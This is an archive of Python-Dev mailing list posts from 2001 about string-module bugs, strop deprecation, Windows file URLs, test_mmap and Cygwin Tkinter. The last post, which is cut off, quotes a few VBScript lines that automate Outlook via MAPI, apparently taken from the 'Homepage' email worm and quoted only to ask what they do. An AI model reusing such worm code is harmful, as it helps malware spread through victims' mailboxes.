So it was!  I must have uploaded a slightly stale version of the
patch, because I noticed this when cvs update conflicted with what I
had in Modules/termios.c... oops.

>   I'm checking in a different patch -- essentially,
> PyObject_AsFileDescriptor() does the right thing, and we don't ever
> need to second guess it.

I was a bit concerned that the error should contain the function name.
On reflection, I agree that the code is so much simpler that it's a
win.

Cheers,
M.

-- 
  Java sucks. [...] Java on TV set top boxes will suck so hard it
  might well inhale people from off  their sofa until their heads
  get wedged in the card slots.              --- Jon Rabone, ucam.chat


From paulp at ActiveState.com  Wed May  9 22:48:38 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Wed, 09 May 2001 13:48:38 -0700
Subject: [Python-Dev] test_urllib2 fails on Win98SE
References: <LNBBLJKPBEHFEDALKOLCAECIKBAA.tim.one@home.com>
Message-ID: <3AF9AD26.AC6DD323@ActiveState.com>

Tim Peters wrote:
> 
>...
> 
> Here's what I know about file URLs on Windows: .

We constantly run into these problems with Komodo. The long and short is
that file URL handling on Windows is totally different than on Unix and
platform-specific code is probably appropriate.

Here's what I know: IE treats the following equivalently:

c:\temp\diff.txt
file:c:\temp\diff.txt
file:/c:\temp\diff.txt
file://c:\temp\diff.txt
file:///c:\temp\diff.txt
file:///////////////////////////////c:\temp\diff.txt

You can also reverse backslashes to slashes and slashes to backslashes
if you like. Interestingly, though, UNC paths seem to work okay (no
matter how you do the slashes and backslashes):

file://americano\home\paulp\foo.html

UNC paths seem to only allow two leading slashes/backslashes.

Truly this is a new level of "be liberal in what you accept". The
algorithm is probably something like:

 1. normalize to forward slashes. 
 2. Remove "file:". 
 3. What you have left should be of the form:

//machine/path

or 

(/*)x:/path

Where x is the drive letter.
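Paul's three steps can be sketched in Python as follows. `file_url_to_windows_path` is a hypothetical name; matching `file:` case-insensitively and skipping percent-decoding are assumptions of this sketch, not observed IE behavior. The drive-letter form is tried before the UNC form because `///c:/...` would otherwise look like a `//machine/path` reference.

```python
import re

# Step 3's two accepted shapes, after normalizing slashes and removing "file:".
_DRIVE_FORM = re.compile(r"^/*([A-Za-z]):/(.*)$")   # (/*)x:/path
_UNC_FORM = re.compile(r"^//([^/]+)/(.*)$")         # //machine/path


def file_url_to_windows_path(url):
    """Map the IE-style file URL variants to a backslash Windows path."""
    s = url.replace("\\", "/")            # 1. normalize to forward slashes
    if s[:5].lower() == "file:":          # 2. remove "file:" (assumed case-insensitive)
        s = s[5:]
    m = _DRIVE_FORM.match(s)              # 3a. any number of slashes, then x:/
    if m:
        drive, rest = m.groups()
        return drive + ":\\" + rest.replace("/", "\\")
    m = _UNC_FORM.match(s)                # 3b. exactly two slashes, then a machine
    if m:
        machine, rest = m.groups()
        return "\\\\" + machine + "\\" + rest.replace("/", "\\")
    raise ValueError("not a drive-letter or UNC file URL: %r" % url)
```

Because `[^/]+` cannot start with a slash, the UNC pattern accepts only two leading slashes, matching Paul's observation about UNC paths.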

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From fredrik at effbot.org  Thu May 10 01:19:40 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Thu, 10 May 2001 01:19:40 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <E14xcwW-0004E4-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>

tim wrote:

> Modified Files:
> stropmodule.c 
> Log Message:
> SF bug #422088: [OSF1 alpha] string.replace().
> Platform blew up on "123".replace("123", "").  Michael Hudson pinned the
> blame on platform malloc(0) returning NULL.

any reason why the

#ifdef MALLOC_ZERO_RETURNS_NULL

macro (in pyport.h) isn't set / doesn't take care of this?

(and is it just me, or does the strop.replace function allocate
a buffer, copy the result to that buffer, only to copy it into a
string and throw the buffer away?  no wonder u"".replace() is
30% faster than "".replace() ;-)

Cheers /F


From tim at digicool.com  Thu May 10 01:39:08 2001
From: tim at digicool.com (Tim Peters)
Date: Wed, 9 May 2001 19:39:08 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>

[Fredrik Lundh]
> any reason why the
>
> #ifdef MALLOC_ZERO_RETURNS_NULL
>
> macro (in pyport.h) isn't set / doesn't take care of this?

The code uses PyMem_MALLOC, which after a chain of umpteen #defines ends up
being plain malloc.  As Michael noted in the bug report, it could have used
PyMem_Malloc() instead and avoided the problem.  But I chose not to do that,
since special-casing a result of 0 was more efficient for reasons other than
malloc.  However:

> (and is it just me, or does the strop.replace function allocate
> a buffer, copy the result to that buffer, only to copy it into a
> string and throw the buffer away?

Yes.  And I'm returning something now that mustn't be free()'ed when the
result length is 0.  Will fix.

> no wonder u"".replace() is 30% faster than "".replace() ;-)

For a given number of characters or bytes <wink>?


From tim.one at home.com  Thu May 10 01:46:13 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 19:46:13 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>

Oh, fuck.  Somebody remind me why we have both stropmodule.c and
stringobject.c?  These bugs exist in both.


From mike.mellor at tbe.com  Thu May 10 02:16:28 2001
From: mike.mellor at tbe.com (mike.mellor at tbe.com)
Date: Thu, 10 May 2001 00:16:28 -0000
Subject: [Python-Dev] CygWin and Tkinter
Message-ID: <9dcmks+6aqf@eGroups.com>

I am playing around with CygWin (which came with Python 2.1 
installed).  While I can run command line programs, Tkinter is not 
part of the package.  TCL/TK is installed and I have been able to 
build TK GUI's.  How can I get Tkinter added to my Python package?  
Thanks.

Mike


From tim.one at home.com  Thu May 10 02:47:52 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 20:47:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com>

test_strop.py contains this line:

    test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0)

string_tests.py has this:

    test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)

IOW, the test suite insists that

    strop.replace('one!two!three!', '!', '@', 0)

replace all matches but that

    string.replace('one!two!three!', '!', '@', 0)
and
    'one!two!three!'.replace('!', '@', 0)

replace nothing.

I've been thrashing like a madman trying to fix a common bug in both modules
(in out-of-synch copies of mymemreplace), and every time I think I fix
something "the other" module breaks.  The above appears to be why.

My opinion:  the test_strop.py test is in error, and so was strop_replace()
in stropmodule.c.  I'm checking in changes accordingly, but won't mind
getting yelled at if you disagree.


From greg at cosc.canterbury.ac.nz  Thu May 10 02:56:12 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 10 May 2001 12:56:12 +1200 (NZST)
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEADKBAA.tim.one@home.com>
Message-ID: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>

Tim Peters <tim.one at home.com>:

>		PyObject *t = (PyObject *)op;
>    		PyString_InternInPlace(&t);

If you want to keep it all on one line, you could try

	PyString_InternInPlace((PyObject **)&op);

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From guido at digicool.com  Thu May 10 04:00:36 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:00:36 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 19:46:13 -0400."
             <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> 
Message-ID: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>

> Oh, fuck.  Somebody remind me why we have both stropmodule.c and
> stringobject.c?  These bugs exist in both.

In my mind, strop is obsolete.  We keep it around because some losers
like to import it directly, but it's basically dead, and except for a
few functions, string.py doesn't use it any more.  (The exceptions are
maketrans, lowercase, uppercase, whitespace.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 10 04:01:20 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:01:20 -0500
Subject: [Python-Dev] CygWin and Tkinter
In-Reply-To: Your message of "Thu, 10 May 2001 00:16:28 GMT."
             <9dcmks+6aqf@eGroups.com> 
References: <9dcmks+6aqf@eGroups.com> 
Message-ID: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>

> I am playing around with CygWin (which came with Python 2.1 
> installed).  While I can run command line programs, Tkinter is not 
> part of the package.  TCL/TK is installed and I have been able to 
> build TK GUI's.  How can I get Tkinter added to my Python package?  
> Thanks.

Beats me.  Ask whoever produces the CygWin port.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Thu May 10 03:07:40 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:07:40 -0400
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDNKBAA.tim.one@home.com>

>>		PyObject *t = (PyObject *)op;
>>   		PyString_InternInPlace(&t);

[Greg Ewing]
> If you want to keep it all on one line, you could try
>
> 	PyString_InternInPlace((PyObject **)&op);

op is declared "register" so it's not strictly legal to apply the address-of
operator to it regardless.  Besides, Guido pays me by the line <wink>.

or-maybe-by-the-useless-checkin-to-judge-from-the-last-24-hours-ly
    y'rs  - tim


From gward at python.net  Thu May 10 03:08:58 2001
From: gward at python.net (Greg Ward)
Date: Wed, 9 May 2001 21:08:58 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:00:36PM -0500
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
Message-ID: <20010509210858.A3467@gerg.ca>

On 09 May 2001, Guido van Rossum said:
> In my mind, strop is obsolete.  We keep it around because some losers
> like to import it directly, but it's basically dead, and except for a
> few functions, string.py doesn't use it any more.  (The exceptions are
> maketrans, lowercase, uppercase, whitespace.)

Perhaps 2.2 should deprecate direct use of strop noisily -- warn when
imported, except when imported by string.py.  (No idea how you'd
implement that, I'm just spouting off.)  Then it could go away in 2.3.
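One possible way to approximate "warn unless string.py is the caller", sketched with the `warnings` module. This swaps Greg's import-time warning for a per-call warning, and it relies on the CPython-specific `sys._getframe()` to find the caller's module; `deprecated_unless_called_from` and `legacy_replace` are hypothetical names, not anything in the Python tree.

```python
import functools
import sys
import warnings


def deprecated_unless_called_from(allowed_module):
    """Warn on each call unless the immediate caller's module is allowed_module."""
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            # Frame 1 is whoever called the wrapper; check its module name.
            caller = sys._getframe(1).f_globals.get("__name__")
            if caller != allowed_module:
                warnings.warn(
                    "%s() is obsolete; use string methods instead" % func.__name__,
                    DeprecationWarning,
                    stacklevel=2,  # report the warning at the caller's line
                )
            return func(*args, **kwargs)
        return wrapper
    return decorator


@deprecated_unless_called_from("string")
def legacy_replace(s, old, new):
    # Hypothetical stand-in for a strop-style function.
    return s.replace(old, new)
```

Warning per call rather than per import avoids having to work out who triggered the import, at the cost of a frame lookup on every call.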

I don't think there's anything particularly controversial about 'strop'
going away after one release with a deprecation warning -- it's not
'string', after all!  (Ie. imported by every single scrap of Python code
ever written before string methods came along, and by quite a lot since
then.)

        Greg
-- 
Greg Ward - nerd                                        gward at python.net
http://starship.python.net/~gward/
I joined scientology at a garage sale!!


From guido at digicool.com  Thu May 10 04:12:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:12:55 -0500
Subject: [Python-Dev] Inconsistent string.replace() behavior
In-Reply-To: Your message of "Wed, 09 May 2001 20:47:52 -0400."
             <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com> 
Message-ID: <200105100212.VAA00491@cj20424-a.reston1.va.home.com>

> test_strop.py contains this line:
> 
>     test('replace', 'one!two!three!', 'one@two@three@', '!', '@', 0)
> 
> string_tests.py has this:
> 
>     test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)
> 
> IOW, the test suite insists that
> 
>     strop.replace('one!two!three!', '!', '@', 0)
> 
> replace all matches but that
> 
>     string.replace('one!two!three!', '!', '@', 0)
> and
>     'one!two!three!'.replace('!', '@', 0)
> 
> replace nothing.
> 
> I've been thrashing like a madman trying to fix a common bug in both modules
> (in out-of-synch copies of mymemreplace), and every time I think I fix
> something "the other" module breaks.  The above appears to be why.
> 
> My opinion:  the test_strop.py test is in error, and so was strop_replace()
> in stropmodule.c.  I'm checking in changes accordingly, but won't mind
> getting yelled at if you disagree.

HMMMMMM!  In Python 1.5, a count of zero always replaces all
occurrences, both using string and using strop.  In 2.0 and later,
strop's replace(..., 0) still replaces all, but string's replaces
none.  The replace() method of strings and unicode objects agrees with
string.py.

I think this change was made for the sake of ease of documenting the
behavior: special-casing the count of zero is unexpected.
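To make the two conventions concrete, a small Python 3 sketch: the built-in `str.replace` takes a count of 0 literally and uses -1 (its default) for "no limit", while `strop_style_replace` is a hypothetical helper emulating the old strop rule that 0 means "replace all".

```python
def strop_style_replace(s, old, new, count=0):
    """Hypothetical emulation of strop.replace(): a count of 0 means 'replace all'."""
    if count == 0:
        count = -1  # str.replace treats a negative count as "no limit"
    return s.replace(old, new, count)


text = "one!two!three!"
print(text.replace("!", "@", 0))                # one!two!three!  (0 replaces nothing)
print(strop_style_replace(text, "!", "@", 0))   # one@two@three@  (0 replaces everything)
```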

I very vaguely recall that it was discussed on this list.

So this suggests that test_string is correct, and string.replace()
(and the methods) shouldn't be "fixed"!

But since we're not really supporting strop any more, I think that
strop shouldn't be changed either.  So we'll have to live with the
difference -- sorry!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Thu May 10 03:13:20 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:13:20 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com>

[Guido]
> In my mind, strop is obsolete.  We keep it around because some losers
> like to import it directly, but it's basically dead, and except for a
> few functions, string.py doesn't use it any more.  (The exceptions are
> maketrans, lowercase, uppercase, whitespace.)

So if Fred changes the docs to say it's obsolete, maybe we can actually rip
out the buggy and redundant code it contains in about 2 years <wink>.

cheeredly y'rs  - tim


From guido at digicool.com  Thu May 10 04:25:43 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:25:43 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 21:08:58 -0400."
             <20010509210858.A3467@gerg.ca> 
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> <200105100200.VAA00411@cj20424-a.reston1.va.home.com>  
            <20010509210858.A3467@gerg.ca> 
Message-ID: <200105100225.VAA00592@cj20424-a.reston1.va.home.com>

> Perhaps 2.2 should deprecate direct use of strop noisily -- warn when
> imported, except when imported by string.py.  (No idea how you'd
> implement that, I'm just spouting off.)  Then it could go away in 2.3.

I have had the necessary mods sitting in my directory for months (it
was one of my first tests for using the warnings module), but decided
against checking it in because I found there's quite a bit of code
that triggered the warnings.  Maybe I should check it into 2.2a0,
so developers can get used to it.

> I don't think there's anything particularly controversial about 'strop'
> going away after one release with a deprecation warning -- it's not
> 'string', after all!  (Ie. imported by every single scrap of Python code
> ever written before string methods came along, and by quite a lot since
> then.)

Agreed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 10 04:27:23 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:27:23 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 21:13:20 -0400."
             <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEDOKBAA.tim.one@home.com> 
Message-ID: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>

> [Guido]
> > In my mind, strop is obsolete.  We keep it around because some losers
> > like to import it directly, but it's basically dead, and except for a
> > few functions, string.py doesn't use it any more.  (The exceptions are
> > maketrans, lowercase, uppercase, whitespace.)
> 
> So if Fred changes the docs to say it's obsolete, maybe we can actually rip
> out the buggy and redundant code it contains in about 2 years <wink>.

Yes, but in the mean time the fact that it's buggy doesn't bother me
at all.  Let it be as buggy as it always was -- that's one more reason
to stop using it! :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Thu May 10 03:33:52 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:33:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
In-Reply-To: <200105100212.VAA00491@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDPKBAA.tim.one@home.com>

[Guido]
> HMMMMMM!  In Python 1.5, a count of zero always replaces all
> occurrences, both using string and using strop.  In 2.0 and later,
> strop's replace(..., 0) still replaces all, but string's replaces
> none.  The replace() method of strings and unicode objects agrees with
> string.py.
>
> I think this change was made for the sake of ease of documenting the
> behavior: special-casing the count of zero is unexpected.

Yes, -1 == infinity is much clearer <wink>.

> I very vaguely recall that it was discussed on this list.
>
> So this suggests that test_string is correct, and string.replace()
> (and the methods) shouldn't be "fixed"!

I didn't change their behavior wrt replace()'s interpretation of count, but
to repair an unrelated bug (bogus MemoryError for an empty-string *result*)
that happened to appear in both copies of mymemreplace sitting in the code
base (one in stringobject.c, another but out-of-synch one in stropmodule.c).
That's how stropmodule got sucked into this:  to fix the gross null-string
result bug common to both.

> But since we're not really supporting strop any more, I think that
> strop shouldn't be changed either.  So we'll have to live with the
> difference -- sorry!

OK, I've restored the 0 == infinity semantics to strop.replace() and
test_strop.py, but have not backed out the null-string result fix, nor the
pain to make the mymemreplace clones identical again.


From tim.one at home.com  Thu May 10 04:00:30 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 22:00:30 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>

[Guido]
> Yes, but in the mean time the fact that it's buggy doesn't bother me
> at all.  Let it be as buggy as it always was -- that's one more reason
> to stop using it! :-)

I think that's unsustainable in this specific case:  stringobject and
stropmodule contained several utility functions with the same names that
clearly started life as identical code.  Over time they got out of synch, and
when they punched me in the face today, I had no idea which was "right" and
which "wrong".  Turned out they both had the same bug, and the clearest way
to fix it in stringobject.c without leaving a more inconsistent x-module mess
was to bring the once-common utility routines back into synch.

As /F said, though, the mymemreplace() approach is inefficient and "should
be" replaced wholesale.  If that's done in stringobject.c alone, great, then
I won't care about the legacy routines in stropmodule.c either.  What I can't
abide is having one copy of a function in the codebase work and a clone of it
not work -- unless you can keep the undocumented history of both in your mind
at all times, you're just as likely to bump into the broken one first when
searching the code base, and if you're unlucky never even realize it is "the
broken one" (or, if you're lucky, bump into the good one too, and then pee
away time trying to understand the differences).

i-have-garbage-in-my-kitchen-too-but-i-put-it-in-a-bag-so-i-don't-
    eat-it-by-mistake<wink>-ly y'rs  - tim


From Jason.Tishler at dothill.com  Thu May 10 04:06:15 2001
From: Jason.Tishler at dothill.com (Jason Tishler)
Date: Wed, 9 May 2001 22:06:15 -0400
Subject: [Python-Dev] CygWin and Tkinter
In-Reply-To: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:01:20PM -0500
References: <9dcmks+6aqf@eGroups.com> <200105100201.VAA00435@cj20424-a.reston1.va.home.com>
Message-ID: <20010509220615.A1928@dothill.com>

Mike,

On Wed, May 09, 2001 at 09:01:20PM -0500, Guido van Rossum wrote:
> > I am playing around with CygWin (which came with Python 2.1 
> > installed).  While I can run command line programs, Tkinter is not 
> > part of the package.  TCL/TK is installed and I have been able to 
> > build TK GUI's.  How can I get Tkinter added to my Python package?  
> > Thanks.
> 
> Beats me.  Ask whoever produces the CygWin port.

I am the Cygwin Python maintainer.  Please see the following for my
views on adding Tkinter support to Cygwin Python:

    http://sources.redhat.com/ml/cygwin/2001-04/msg01842.html

If Tkinter support is important to you, then please submit the appropriate
patches for consideration to the Python Patch Manager on SourceForge.

Norman Vine has built a Cygwin Python that supports Tkinter.  See the
following for his build procedure:

    http://www.vso.cape.com/~nhv/files/python/

Perhaps you would like to collaborate with Norman on this effort?

Thanks,
Jason

-- 
Jason Tishler
Director, Software Engineering       Phone: +1 (732) 264-8770 x235
Dot Hill Systems Corp.               Fax:   +1 (732) 264-8798
82 Bethany Road, Suite 7             Email: Jason.Tishler at dothill.com
Hazlet, NJ 07730 USA                 WWW:   http://www.dothill.com


From tim.one at home.com  Thu May 10 04:54:45 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 22:54:45 -0400
Subject: [Python-Dev] test_mmap failing?
Message-ID: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>

I checked in a change to mmapmodule.c earlier today, to close a patch
complaining about unused vrbl warnings.

Here's the changed routine before ("value" is unused):

mmap_read_byte_method(mmap_object *self,
                      PyObject *args)
{
        char value;
        char *where;
        CHECK_VALID(NULL);
        if (!PyArg_ParseTuple(args, ":read_byte"))
                return NULL;
        if (self->pos < self->size) {
                where = self->data + self->pos;
                value = (char) *(where);
                self->pos += 1;
                return Py_BuildValue("c", (char) *(where));
        } else {
                PyErr_SetString (PyExc_ValueError, "read byte out of range");
                return NULL;
        }
}

and after:

mmap_read_byte_method(mmap_object *self,
                      PyObject *args)
{
        CHECK_VALID(NULL);
        if (!PyArg_ParseTuple(args, ":read_byte"))
                return NULL;
        if (self->pos < self->size) {
                char value = self->data[self->pos];
                self->pos += 1;
                return Py_BuildValue("c", value);
        } else {
                PyErr_SetString (PyExc_ValueError, "read byte out of range");
                return NULL;
        }
}
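Modelled in Python, both versions of the routine do the same three things: bounds-check `pos` against `size`, read the byte at `pos`, and advance `pos` by one. `MmapLike` is a hypothetical stand-in for the C `mmap_object`; it returns a one-byte `bytes` value, mirroring `Py_BuildValue("c", ...)`, whereas the real Python 3 `mmap.read_byte()` returns an int.

```python
class MmapLike:
    """Hypothetical stand-in for mmap_object: a data buffer plus a read position."""

    def __init__(self, data):
        self.data = bytes(data)
        self.size = len(self.data)
        self.pos = 0

    def read_byte(self):
        if self.pos < self.size:
            value = self.data[self.pos:self.pos + 1]  # the byte at pos, as length-1 bytes
            self.pos += 1
            return value
        raise ValueError("read byte out of range")
```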

I'll be damned if I can see any semantic difference, and test_mmap worked
fine on Windows after the change.  But Fred reported:

"""
the fix introduced breakage on Linux (kernel 2.2.17):

cj42289-a(.../python/linux-beowolf); ./python ../Lib/test/regrtest.py -v test_mmap
test_mmap
test_mmap
test test_mmap crashed -- exceptions.IOError: [Errno 22] Invalid argument
Traceback (most recent call last):
  File "../Lib/test/regrtest.py", line 246, in runtest
    __import__(test, globals(), locals(), [])
  File "../Lib/test/test_mmap.py", line 124, in ?
    test_both()
  File "../Lib/test/test_mmap.py", line 14, in test_both
    f.write('\0'* PAGESIZE)
IOError: [Errno 22] Invalid argument
1 test failed: test_mmap
"""

However, at the point that's failing, test_mmap hasn't even *created* an
mmap'ed file yet, let alone tried to read from it.  The only thing test_mmap
did so far is (the first comment is bogus -- that's the builtin Python open()
function):

    # Create an mmap'ed file   # THIS IS A BOGUS COMMENT
    f = open('foo', 'w+')

    # Write 2 pages worth of data to the file
    f.write('\0'* PAGESIZE)    # THIS IS THE LINE IT'S DYING ON

But having suffered too many "impossible problems" the last 36 hours, my
confidence is shot <0.93 wink>.  Is test_mmap failing for anyone else under
current CVS?  Fred, are you *sure* it fails for you -- if so, does the
problem actually go away if you revert mmapmodule.c?

looking-for-sense-in-all-the-wrong-places-ly y'rs  - tim


From jeremy at digicool.com  Thu May 10 05:17:34 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Wed, 9 May 2001 23:17:34 -0400 (EDT)
Subject: [Python-Dev] test_mmap failing?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com>
Message-ID: <15098.2126.368714.159135@slothrop.digicool.com>

The latest CVS build works on my Linux 2.2.12 system.  No problem with
test_mmap.  But test_pty does fail with some complaints about FCNTL,
which Fred just removed.  Maybe Fred is working in an alternate
universe where test_mmap and test_pty are swapped.

Jeremy


From barry at digicool.com  Thu May 10 06:08:42 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 10 May 2001 00:08:42 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>
	<LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>
Message-ID: <15098.5194.677531.35326@anthem.wooz.org>

>>>>> "TP" == Tim Peters <tim.one at home.com> writes:

    TP> Oh, fuck.  Somebody remind me why we have both stropmodule.c
    TP> and stringobject.c?  These bugs exist in both.

IIRC, I once proposed to share code bases through elaborate
#includes and exported functions, but that never went very far.
Guido's already pronounced on this, and I'd say good riddance to
strop.

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> Yes, but in the mean time the fact that it's buggy doesn't
    GvR> bother me at all.  Let it be as buggy as it always was --
    GvR> that's one more reason to stop using it! :-)
-----------------------------------^^^^

For a minute there, I thought you said "to strop using it". :)

-Barry


From fredrik at pythonware.com  Thu May 10 08:22:53 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Thu, 10 May 2001 08:22:53 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <LNBBLJKPBEHFEDALKOLCKEEBKBAA.tim.one@home.com>
Message-ID: <004001c0d919$a62de7d0$e46940d5@hagrid>

Tim Peters wrote:
> I think that's unsustainable in this specific case:  stringobject and
> stropmodule contained several utility functions with the same names that
> clearly started life as identical code.  Over time they got out of synch, and
> when they punched me in the face today, I had no idea which was "right" and
> which "wrong".  Turned out they both had the same bug, and the clearest way
> to fix it in stringobject.c without leaving a more inconsistent x-module mess
> was to bring the once-common utility routines back into synch.
> 
> As /F said, though, the mymemreplace() approach is inefficient and "should
> be" replaced wholesale.  If that's done in stringobject.c alone, great, then
> I won't care about the legacy routines in stropmodule.c either.

as a footnote, SRE uses the same source code to generate
both 8-bit and 16-bit versions of the match engine.  I see no
reason why we cannot do the same for the string operations
(PyString, PyUnicode, and strop).
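SRE does this at the C level by compiling one source file for each character width. As a rough Python analogue only (not SRE's mechanism), a single routine can serve both text and byte strings if it uses only operations the two types share. A minimal Python 3 sketch; `generic_replace` is a hypothetical name:

```python
def generic_replace(s, old, new, count=-1):
    """Replace up to count occurrences of old with new (all if count < 0).

    Works unchanged for str and bytes because it relies only on find(),
    slicing and join(), which both types provide.
    """
    if not old:
        raise ValueError("empty pattern")  # keep the sketch simple
    pieces = []
    start = 0
    while count != 0:
        i = s.find(old, start)
        if i < 0:
            break
        pieces.append(s[start:i])
        pieces.append(new)
        start = i + len(old)
        count -= 1
    pieces.append(s[start:])
    # s[:0] is an empty str or empty bytes, matching the input's type.
    return s[:0].join(pieces)
```

One copy of the logic means a bug fixed once is fixed for every string type, which is the point of sharing the source.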

if anyone wants me to look into this, just say "go ahead".  

> > no wonder u"".replace() is 30% faster than "".replace() ;-)
> 
> For a given number of characters or bytes <wink>?

characters.  judging from the SRE benchmarks, modern platforms
can process 16-bit characters as fast as they can process 8-bit
characters.

Cheers /F


From thomas at xs4all.net  Thu May 10 11:31:38 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 10 May 2001 11:31:38 +0200
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091712.TAA05172@core.inf.ethz.ch>; from pedroni@inf.ethz.ch on Wed, May 09, 2001 at 07:12:20PM +0200
References: <200105091712.TAA05172@core.inf.ethz.ch>
Message-ID: <20010510113138.K16486@xs4all.nl>

On Wed, May 09, 2001 at 07:12:20PM +0200, Samuele Pedroni wrote:

> Set s=CreateObject("Outlook.Application")
> Set t=s.GetNameSpace("MAPI")
> Set u=t.GetDefaultFolder(6)

[..]

> Set u=t.GetDefaultFolder(3)

I know it's off-topic, but Greg started it! ;-) Does anyone know which
folders those two 'GetDefaultFolder' statements open ? I suspect it's
